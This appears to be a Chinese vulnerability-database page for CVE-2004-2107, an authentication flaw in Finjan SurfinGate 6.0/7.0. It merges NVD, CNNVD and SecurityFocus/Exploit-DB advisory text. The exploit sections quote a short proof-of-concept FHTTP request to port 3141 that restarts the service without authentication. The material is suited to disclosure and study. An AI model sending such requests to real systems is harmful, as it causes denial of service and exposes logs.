CVE-2004-2107
CVSS7.5
发布时间 :2004-12-31 00:00:00
修订时间 :2016-10-17 23:06:19
NMCOES    

[原文]Finjan SurfinGate 6.0 and 7.0, when running in proxy mode, does not authenticate FHTTP commands on TCP port 3141, which allows remote attackers to use the finjan-parameter-type header to (1) restart the service, (2) use the getlastmsg command to view log information, or (3) use the online command to force a policy update from the database server.


[CNNVD]Finjan SurfinGate FHTTP重启命令执行漏洞(CNNVD-200412-960)

        
        Finjan SurfinGate提供对WEB通信的恶意代码扫描,主要对active内容进行基于行为的过滤。
        Finjan SurfinGate不正确处理特殊构建的请求,远程攻击者可以利用这个漏洞重启服务,可造成拒绝服务。
        SurfinGate扫描服务器接收命令是通过监听控制端口(默认TCP/3141),并使用FHTTP协议进行控制,但这些命令没有进行任何验证并可以来自任何地方,包括本地的HTTP代理,因此允许任意用户通过代理服务器发送服务命令。
        请求的'finjan-parameter-type'参数就是控制命令,提交restart数据可导致服务重新启动,产生拒绝服务。另外提交getlastmsg命令可查看日志信息等。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:finjan_software:surfingate:6.0
cpe:/a:finjan_software:surfingate:6.0_5
cpe:/a:finjan_software:surfingate:7.0
cpe:/a:finjan_software:surfingate:6.0_1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2107
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2107
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-960
(官方数据源) CNNVD

- 其它链接及资源

http://archives.neohapsis.com/archives/fulldisclosure/2004-01/0929.html
(PATCH)  FULLDISC  20040123 Finjan SurfinGate Vulnerability
http://marc.info/?l=bugtraq&m=107487999406339&w=2
(UNKNOWN)  BUGTRAQ  20040123 Finjan SurfinGate Vulnerability
http://marc.info/?l=bugtraq&m=107522480913629&w=2
(UNKNOWN)  BUGTRAQ  20040126 RE: Finjan SurfinGate Vulnerability
http://www.securityfocus.com/bid/9478
(PATCH)  BID  9478
http://xforce.iss.net/xforce/xfdb/14934
(UNKNOWN)  XF  finjan-surfingate-execute-commands(14934)

- 漏洞信息

Finjan SurfinGate FHTTP重启命令执行漏洞
高危 访问验证错误
2004-12-31 00:00:00 2005-10-20 00:00:00
远程  
        
        Finjan SurfinGate提供对WEB通信的恶意代码扫描,主要对active内容进行基于行为的过滤。
        Finjan SurfinGate不正确处理特殊构建的请求,远程攻击者可以利用这个漏洞重启服务,可造成拒绝服务。
        SurfinGate扫描服务器接收命令是通过监听控制端口(默认TCP/3141),并使用FHTTP协议进行控制,但这些命令没有进行任何验证并可以来自任何地方,包括本地的HTTP代理,因此允许任意用户通过代理服务器发送服务命令。
        请求的'finjan-parameter-type'参数就是控制命令,提交restart数据可导致服务重新启动,产生拒绝服务。另外提交getlastmsg命令可查看日志信息等。
        

- 公告与补丁

        厂商补丁:
        Finjan Software
        ---------------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.finjan.com/products/surfingate.cfm

- 漏洞信息 (23585)

Finjan SurfinGate 6.0/7.0 FHTTP Restart Command Execution Vulnerability (EDBID:23585)
linux remote
2004-01-23 Verified
0 David Byrne
N/A [点击下载]
source: http://www.securityfocus.com/bid/9478/info

Finjan SurfinGate is prone to a vulnerability that may permit remote attackers to execute certain management commands (using the FHTTP protocol) through the management control port (3141/TCP). It has been reported that commands could be issued to restart the server, most likely resulting in a denial of service. 

Example 1:
>>> CONNECT LOCALHOST:3141 HTTP/1.0
>>>

<<< HTTP/1.0 200 Connection established
<<< Proxy-agent: Finjan-SurfinGate/6.0
<<<

>>> FINJAN /stam HTTP/1.0
>>> finjan-version: fhttp/1.0
>>> finjan-command: custom
>>> finjan-parameter-category: console
>>> finjan-parameter-type: restart
>>> content-length: 0
>>>

<<< HTTP/1.0 200 OK
<<< finjan-version: fhttp/1.0
<<<
<<<


Example 2:
>>> FINJAN localhost:3141/stam HTTP/1.0
>>> finjan-version: fhttp/1.0
>>> finjan-command: custom
>>> finjan-parameter-category: console
>>> finjan-parameter-type: restart
>>> content-length: 0
>>>

<<< HTTP/1.0 200 OK
<<< finjan-version: fhttp/1.0
<<<
<<< 		

- 漏洞信息

3718
Finjan SurfinGate Proxy FHTTP Command Admin Functions Authentication Bypass

- 漏洞描述

- 时间线

2004-01-27 Unknow
Unknow Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Finjan SurfinGate FHTTP Restart Command Execution Vulnerability
Access Validation Error 9478
Yes No
2004-01-23 12:00:00 2009-07-12 02:06:00
Discovery of this issue is credited to David Byrne.

- 受影响的程序版本

Finjan Software SurfinGate 7.0
Finjan Software SurfinGate 6.0 5
Finjan Software SurfinGate 6.0 1
Finjan Software SurfinGate 6.0

- 漏洞讨论

Finjan SurfinGate is prone to a vulnerability that may permit remote attackers to execute certain management commands (using the FHTTP protocol) through the management control port (3141/TCP). It has been reported that commands could be issued to restart the server, most likely resulting in a denial of service.

- 漏洞利用

The following example requests were provided:

Example 1:
&gt;&gt;&gt; CONNECT LOCALHOST:3141 HTTP/1.0
&gt;&gt;&gt;

&lt;&lt;&lt; HTTP/1.0 200 Connection established
&lt;&lt;&lt; Proxy-agent: Finjan-SurfinGate/6.0
&lt;&lt;&lt;

&gt;&gt;&gt; FINJAN /stam HTTP/1.0
&gt;&gt;&gt; finjan-version: fhttp/1.0
&gt;&gt;&gt; finjan-command: custom
&gt;&gt;&gt; finjan-parameter-category: console
&gt;&gt;&gt; finjan-parameter-type: restart
&gt;&gt;&gt; content-length: 0
&gt;&gt;&gt;

&lt;&lt;&lt; HTTP/1.0 200 OK
&lt;&lt;&lt; finjan-version: fhttp/1.0
&lt;&lt;&lt;
&lt;&lt;&lt;


Example 2:
&gt;&gt;&gt; FINJAN localhost:3141/stam HTTP/1.0
&gt;&gt;&gt; finjan-version: fhttp/1.0
&gt;&gt;&gt; finjan-command: custom
&gt;&gt;&gt; finjan-parameter-category: console
&gt;&gt;&gt; finjan-parameter-type: restart
&gt;&gt;&gt; content-length: 0
&gt;&gt;&gt;

&lt;&lt;&lt; HTTP/1.0 200 OK
&lt;&lt;&lt; finjan-version: fhttp/1.0
&lt;&lt;&lt;
&lt;&lt;&lt;

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站